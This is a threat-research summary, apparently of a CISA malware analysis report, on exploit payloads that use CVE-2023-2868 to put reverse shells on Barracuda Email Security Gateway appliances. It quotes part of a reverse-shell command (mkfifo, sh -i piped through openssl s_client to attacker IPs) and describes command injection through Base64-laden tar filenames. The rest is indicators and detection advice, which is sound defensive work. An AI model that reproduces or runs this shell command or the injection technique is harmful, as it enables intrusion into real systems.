Threat Research

MAR-10454006-r3.v1 Exploit Payload Backdoor | CISA

CISA

CISA analyzed 14 samples of Barracuda exploit payloads that leverage CVE-2023-2868 to perform command injection and install Base64-encoded reverse shells on affected Barracuda Email Security Gateway appliances. The reverse shells create OpenSSL-based encrypted connections to C2 servers (notably 107.148.223.196 and 107.148.219.54) after being delivered via phishing emails with malicious .tar attachments. #CVE-2023-2868 #BarracudaESG #107148223196

Keypoints

  • CISA obtained and analyzed 14 malware samples containing exploit payloads and reverse shell backdoors targeting Barracuda Email Security Gateway (ESG).
  • The attacks exploit CVE-2023-2868 (command injection) in Barracuda ESG versions 5.1.3.001–9.2.0.006 to execute malicious commands on the appliance.
  • Actors delivered the payloads via phishing emails carrying .tar attachments; one filename inside the archive contained a Base64-encoded payload that triggered the exploit when processed.
  • Decoded payloads execute shell commands that create a named pipe (/tmp/p) and spawn an interactive shell piped through openssl s_client to C2 IPs 107.148.223.196 (ports 8080/443) and 107.148.219.54:443.
  • Multiple TAR samples (e.g., snapshot.tar, snapshot0.tar) drop a small ASCII payload file whose filename contains the Base64-encoded exploit; two example dropped hashes are 2a5de691243f…cd40b and 949d4b01f312…df788.
  • YARA rules (CISA_10454006_08/09 and CISA_10452108_03) detect these reverse shell samples; ESET flags them as Linux/Exploit.CVE-2023-2868.A.
  • IOCs include numerous SHA256 hashes, the C2 IPs 107[.]148[.]223[.]196 and 107[.]148[.]219[.]54, and malicious .tar filenames embedding the exploit payload.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The vulnerability CVE-2023-2868 was exploited to run arbitrary commands on the Barracuda ESG (‘…the payload triggers a command injection (exploiting CVE-2023-2868)…’).
  • [T1566] Phishing – Initial delivery used phishing emails with malicious .tar attachments to deliver the exploit payload (‘…delivered this payload to the victim via a phishing email with a malicious .tar attachment.’).
  • [T1105] Ingress Tool Transfer – Malicious .tar archives contained files/filenames that dropped the encoded payloads onto the appliance (‘…a file contains a malicious payload inside its filename that exploits CVE-2023-2868.’).
  • [T1059] Command and Scripting Interpreter – The exploit runs shell commands (setsid, mkfifo, sh -i) to create an interactive reverse shell (‘setsid sh -c “mkfifo /tmp/p;sh -i &1|openssl s_client …;rm /tmp/p”‘).
  • [T1573] Encrypted Channel – The reverse shells use OpenSSL (openssl s_client -quiet -connect) to establish encrypted C2 communications to attacker-controlled IPs (‘…|openssl s_client -quiet -connect 107[.]148[.]223[.]196:8080 >/tmp/p 2>/dev/null;rm /tmp/p’).

Indicators of Compromise

  • [SHA256 hashes] sample identifiers – 2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095, 0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6, and 12 more hashes.
  • [IP addresses] C2 servers – 107[.]148[.]223[.]196, 107[.]148[.]219[.]54 (used by openssl s_client connections on ports 8080 and 443).
  • [File names] malicious archive and dropped filenames – snapshot.tar, snapshot0.tar, and embedded payload filenames beginning with “abcdefg…” that contain Base64-encoded exploit payloads.
  • [File types] archive delivery – POSIX tar archives (GNU) used to deliver and drop the payloads (examples: snapshot.tar, snapshot0.tar).

Attackers packaged a Base64-encoded shell payload inside the filename of files within .tar archives attached to phishing emails. When the exploit triggers (CVE-2023-2868), the encoded block is decoded and executed; that block references an inner Base64 payload which decodes to a shell command that creates a named pipe and runs an interactive shell.

The decoded commands use setsid and mkfifo to background a session and create /tmp/p, then pipe sh -i through openssl s_client with the -quiet flag to connect to attacker C2 hosts (observed: 107.148.223.196 on ports 8080 and 443, and 107.148.219.54 on port 443). Output and error streams are redirected to the pipe and errors suppressed to /dev/null; /tmp/p is removed when the session ends.

CISA supplied YARA rules (e.g., CISA_10454006_08/09 and CISA_10452108_03) to detect these reverse-shell-in-filename artifacts and published sample SHA256 hashes; ESET flags the samples as Linux/Exploit.CVE-2023-2868.A. Analysts should scan archives for filenames containing Base64 strings, monitor for mkfifo/setsid/openssl s_client usage, and block or investigate connections to the listed C2 IPs.

Read more: https://www.cisa.gov/news-events/analysis-reports/ar23-209c

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint